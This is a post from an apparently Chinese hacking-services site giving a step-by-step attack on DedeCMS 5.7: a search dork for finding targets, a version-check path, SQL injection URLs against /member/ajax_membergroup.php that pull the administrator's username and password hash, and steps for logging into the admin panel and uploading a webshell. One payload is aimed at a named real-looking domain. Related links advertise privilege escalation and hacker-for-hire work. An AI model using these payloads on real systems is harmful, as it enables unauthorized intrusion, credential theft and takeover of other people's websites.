找黑客平台

dedecms 版本漏洞

hacker4年前黑客文章970

织网5.7的漏洞,可任意上传~

搜索关键词:Powered by DedeCMSV57_GBK 2004-2011 DesDev Inc

访问/data/admin/ver.txt来查看cms

然后访问/member/ajax_membergroup.php?action=post&membergroup=1,出现"朋友 修改"即可注入

通过注入得到管理员帐号密码,搜后台,上传大马OK~提权还在学习阶段~

1

查看网站的版本

code 区域 
cms /data/admin/ver.txt

2

查看是否有"朋友 修改",有则存在注入


code 区域 
/member/ajax_membergroup.php?action=post&membergroup=1

3

帐号

code 区域 
http://www.dzdyk.com /member/ajax_membergroup.php?action=post&membergroup=@`'` Union select userid from `%23@__admin` where 1 or id=@`'`

4

去掉前三位和最后一位,得到管理员密码

code 区域 
/member/ajax_membergroup.php?action=post&membergroup=@`'` Union select pwd from `%23@__admin` where 1 or id=@`'`

5

扫后台,登录成功

6

后台页面

7

模块-文件管理器-文件上传 上传大马

8

登录webshell

标签: 黑客技术
返回列表

上一篇:Ecshop后台拿shell方法(版本自测)

下一篇:百度快照是如何被黑客篡改的

相关文章

Nmap是用以端口扫描器,服务项目检验,乃至是漏洞检测等多种

Nmap是用以端口扫描器,服务项目检验,乃至是漏洞检测等多种

Nmap是用以端口扫描器,服务项目检验,乃至是漏洞检测等多种多样作用的强劲专用工具。Nmap从新手入门到高級遮盖了很多基本的定义和指令,在本文的第二一部分,我将谈及Nmap一些高級的技术性。 &nb...

教你各种黑客技术  如何学习黑客技术

教你各种黑客技术  如何学习黑客技术

作为网络爱好者,我们中的很多人都有一个黑客梦,就如同多数男孩都有一个武侠梦。黑客们凭借着高超的电脑技术、来无影去无踪的身手,宛如一个个武艺高超,轻功卓越的大侠在我们眼前飘过,令人心驰神往,却又可遇而不...

详解测试IP地址的几个命令

如果你是一位网络管理员或者是一位普通的拨号用户,可能经常会遇到这样一种情形,那就是访问某一个网站时可能会花费好长时间,或者根本就无法访问需要的网站,这样我们许多宝贵的时间就消耗在等待上了。那我们有没有...

专用工具完全免费使用方法

专用工具完全免费使用方法

什么叫Beef? 电脑浏览器开发框架(Beef)是另一个很好的热门专业安全工器具。该专用工具将为网站渗透测试员发展技术性出示工作经验,与别的专用工具不一样,Beef致力于运用电脑浏览器系统漏洞来查验...

对于提权成功后3389连不上的几种解决办法

对于提权成功后3389连不上的几种解决办法

有时候我们入侵提完权后,3389端口开了,可还是没办法连3389,这是非常蛋疼的一件事。连不上通常用以下几种可能以及对应的解决办法。 提供一些思路和方法。 方法一:网站服务器在内网。...

黑客接单:txt文件挂马攻击

一. 隐藏HTML扩展名的TXT文件     假如您收到的邮件附件中有一个看起来是这样的文件:QQ靓号赠送.txt,您是不是认为它肯定是纯文本文件?我要告诉您,不一定!它的实际文件名可以是...

Copyright Your WebSite.Some Rights Reserved.

免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!

Hacker by Hacker.